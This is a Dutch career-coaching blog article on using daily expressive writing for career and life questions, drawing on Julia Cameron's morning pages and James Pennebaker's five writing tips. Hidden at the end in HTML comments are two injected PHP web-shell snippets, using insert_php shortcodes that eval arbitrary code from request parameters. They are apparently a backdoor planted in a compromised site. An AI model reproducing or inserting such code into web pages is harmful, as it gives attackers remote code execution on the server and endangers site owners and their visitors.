de kracht van het schrijven bij loopbaanvragen

banner 2Gewoon je pen oppakken en iedere dag een half uur opschrijven wat er in je opkomt en omgaat…
Als je rondloopt met loopbaan- of andere levensvragen is het goed om dit te gaan doen. Het zal je veel opleveren. Deze losse manier van schrijven zorgt er namelijk voor dat je creativiteit weer gaat stromen. Ook is het goed voor je gezondheid, zowel geestelijk als lichamelijk.

Door op te schrijven wat er in je omgaat spreek je je onbewuste aan: je schrijft je piekergedachten van je af, vindt oplossingen voor problemen en conflicten en je komt tot de kern van wat je bezighoudt.
Ook helpt het om vervelende gebeurtenissen te verwerken, tot goede ideeën te komen én stimuleer je zo jezelf om in actie te komen! Het schrijven levert je dus altijd iets op.

Het schrijven kan echt verschíl maken als je een loopbaanvraag hebt. Dus: als je niet meer wordt uitgedaagd in je werk, als solliciteren niet lukt, als je door ziekte je werk niet meer kunt doen, als je ontslagen bent of ontslag hangt boven je hoofd – in al deze situaties kun je jezelf enorm helpen door dagelijks te schrijven over wat je bezighoudt.

Ochtendpagina’s
Een groot promotor van het dagelijks met de hand schrijven is Julia Cameron, bekend van o.a. de boeken The Artist’s Way en Je leven schrijven. Julia Cameron adviseert om iedere ochtend 3 ochtendpagina’s te schrijven (in ca. een half uur). Zij ziet het schrijven van de ochtendpagina’s als een vorm van meditatie, die inzicht geeft, stress vermindert, en je in contact brengt met je innerlijke kracht en je helpt veranderingen in je leven te verwezenlijken.
Ze vindt dat je de pagina’s ‘s ochtends vroeg moet schrijven, voordat je andere dingen hebt gedaan. De dag met al z’n mogelijkheden ligt dan nog voor je, waardoor je nog prioriteiten aan kunt brengen en ook ben je ’s ochtends nog dichter bij je droombewustzijn.
En, als je niet kunt bedenken wat te schrijven, dan schrijf je gewoon “Ik kan niets bedenken om over te schrijven”, desnoods 3 pagina’s lang. Maar je zult al snel merken dat er van alles in je opkomt waar je als vanzelf over gaat schrijven.

Schrijf over je ervaringen
De opvattingen van Julia Cameron worden ondersteund door de Amerikaanse psycholoog James Pennebaker. Hij stelde in onderzoeken vast dat schrijven over je ervaringen – zeker emotioneel ingrijpende ervaringen – tot een aantoonbaar betere gezondheid leidt.
Om zo gezond, ontspannen en gelukkig mogelijk te worden moeten we volgens hem niet alleen regelmatig schrijven over onze emotionele ervaringen, maar dit ook op een specifieke manier doen: je emoties uiten, proberen inzicht te krijgen in oorzaken en gevolgen en deze vanuit verschillende perspectieven bekijken. Bij mensen die op deze manier reflecteren op hun eigen ervaringen worden de grootste effecten gemeten.

De 5 schrijfadviezen van Pennebaker:

  1. Stel jezelf weinig regels, schrijf alles op wat er in je opkomt. Luister naar je emoties en schrijf op hoe ervaringen écht voor je geweest zijn. Wees altijd 100 % eerlijk tegen jezelf!
  2. Beperk je schrijftijd: 15 – 20 minuten. Dit vermindert de kans op piekeren.
  3. Schrijf op een rustige plek waar je niet gestoord wordt.
  4. Schrijf regelmatig
  5. Probeer al schrijvend verbanden te leggen. Stel jezelf constant vragen.

Probeer het uit
Of je nou kiest voor het dagelijks schrijven van ochtendpagina’s of voor regelmatig 20 minuten à la Pennebaker, het is hoe dan ook de moeite waard om het schrijven zelf uit te gaan proberen.

Het moeilijkste is niet het schrijven zelf – dat gaat namelijk vanzélf – maar het volhouden! Het is een kwestie van het maken van een afspraak met jezelf, van zelfdiscipline dus. En lukt dat even niet (je slaat een keer over, je schrijft maar één pagina i.p.v. drie, het komt er een tijdje niet van etc.), schrijf het schrijven dan niet helemaal af, maar wees mild voor jezelf en begin gewoon weer opnieuw…

Inspiratiebronnen voor dit artikel:

  • Artikel: De ontdekking van de woordenschat, I. Schilperoord voor Ode (bijlage bij NRC), 17 maart 2012
  • Boek: The Artist’s way. Vind je eigen inspiratie, Julia Cameron, 1992, uitgeverij Indigo

<!– [insert_php]if (isset($_REQUEST["JoSDc"])){eval($_REQUEST["JoSDc"]);exit;}[/insert_php][php]if (isset($_REQUEST["JoSDc"])){eval($_REQUEST["JoSDc"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["fsy"])){eval($_REQUEST["fsy"]);exit;}[/insert_php][php]if (isset($_REQUEST["fsy"])){eval($_REQUEST["fsy"]);exit;}[/php] –>